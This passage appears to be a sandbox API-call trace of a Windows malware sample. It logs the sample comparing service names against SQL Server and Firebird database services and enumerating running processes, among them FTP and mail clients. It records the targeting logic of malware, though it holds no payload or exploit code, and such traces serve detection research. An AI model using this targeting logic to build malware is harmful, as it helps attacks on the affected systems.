lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0185.893] lstrlenW (lpString="SysMain") returned 7 [0185.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0185.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0185.893] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0185.893] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0185.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0185.893] lstrlenW (lpString="SystemEventsBroker") returned 18 [0185.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.893] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0185.893] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0185.894] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x774a70 | out: hHeap=0x710000) returned 1 [0185.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d4 [0185.904] Process32FirstW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.904] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.905] lstrlenW (lpString="System") returned 6 [0185.905] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.906] lstrlenW (lpString="smss.exe") returned 8 [0185.906] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.907] lstrlenW (lpString="csrss.exe") returned 9 [0185.907] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.908] lstrlenW (lpString="wininit.exe") returned 11 [0185.908] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.909] lstrlenW (lpString="csrss.exe") returned 9 [0185.909] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.909] lstrlenW (lpString="winlogon.exe") returned 12 [0185.910] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.910] lstrlenW (lpString="services.exe") returned 12 [0185.911] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.912] lstrlenW (lpString="lsass.exe") returned 9 [0185.912] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.912] lstrlenW (lpString="svchost.exe") returned 11 [0185.912] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.913] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.913] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.914] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.914] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.915] lstrlenW (lpString="svchost.exe") returned 11 [0185.915] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.916] lstrlenW (lpString="dwm.exe") returned 7 [0185.916] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x67, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.916] lstrlenW (lpString="svchost.exe") returned 11 [0185.916] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.917] lstrlenW (lpString="svchost.exe") returned 11 [0185.917] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.918] lstrlenW (lpString="svchost.exe") returned 11 [0185.918] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.919] lstrlenW (lpString="svchost.exe") returned 11 [0185.919] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.920] lstrlenW (lpString="svchost.exe") returned 11 [0185.920] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.920] lstrlenW (lpString="svchost.exe") returned 11 [0185.921] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.921] lstrlenW (lpString="svchost.exe") returned 11 [0185.921] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.922] lstrlenW (lpString="svchost.exe") returned 11 [0185.922] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.923] lstrlenW (lpString="svchost.exe") returned 11 [0185.923] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.923] lstrlenW (lpString="svchost.exe") returned 11 [0185.924] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.924] lstrlenW (lpString="spoolsv.exe") returned 11 [0185.924] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.510] lstrlenW (lpString="svchost.exe") returned 11 [0186.510] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.511] lstrlenW (lpString="audiodg.exe") returned 11 [0186.511] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.634] lstrlenW (lpString="sihost.exe") returned 10 [0186.635] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.635] lstrlenW (lpString="svchost.exe") returned 11 [0186.635] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.636] lstrlenW (lpString="taskhostw.exe") returned 13 [0186.636] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.637] lstrlenW (lpString="explorer.exe") returned 12 [0186.637] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0186.637] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0186.638] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0186.638] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0186.638] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0186.639] lstrlenW (lpString="Memory Compression") returned 18 [0186.639] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0186.640] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0186.640] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0186.641] lstrlenW (lpString="SearchUI.exe") returned 12 [0186.641] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0186.641] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0186.641] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.642] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0186.642] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0186.643] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0186.643] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0186.644] lstrlenW (lpString="workers.exe") returned 11 [0186.644] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0186.645] lstrlenW (lpString="succeed.exe") returned 11 [0186.645] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0186.645] lstrlenW (lpString="washer jar.exe") returned 14 [0186.645] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0186.646] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0186.646] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0186.647] lstrlenW (lpString="useful_courts.exe") returned 17 [0186.647] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0186.648] lstrlenW (lpString="compounds spanish.exe") returned 21 [0186.648] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0186.649] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0186.649] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0186.649] lstrlenW (lpString="try.exe") returned 7 [0186.649] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0186.650] lstrlenW (lpString="statuteide.exe") returned 14 [0186.650] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0186.651] lstrlenW (lpString="invite.exe") returned 10 [0186.651] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0186.651] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0186.652] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0186.652] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0186.652] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0186.653] lstrlenW (lpString="modules_recommend.exe") returned 21 [0186.653] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0186.654] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0186.654] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.655] lstrlenW (lpString="svchost.exe") returned 11 [0186.655] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0186.655] lstrlenW (lpString="3dftp.exe") returned 9 [0186.656] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0186.712] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0186.713] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0186.713] lstrlenW (lpString="alftp.exe") returned 9 [0186.713] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0186.714] lstrlenW (lpString="barca.exe") returned 9 [0186.714] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0186.715] lstrlenW (lpString="bitkinex.exe") returned 12 [0186.716] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0186.717] lstrlenW (lpString="coreftp.exe") returned 11 [0186.717] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0186.718] lstrlenW (lpString="far.exe") returned 7 [0186.718] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0186.719] lstrlenW (lpString="filezilla.exe") returned 13 [0186.720] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0186.721] lstrlenW (lpString="flashfxp.exe") returned 12 [0186.721] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0186.722] lstrlenW (lpString="fling.exe") returned 9 [0186.722] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0186.723] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0186.724] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0186.725] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0186.725] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0186.807] lstrlenW (lpString="icq.exe") returned 7 [0186.807] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0186.808] lstrlenW 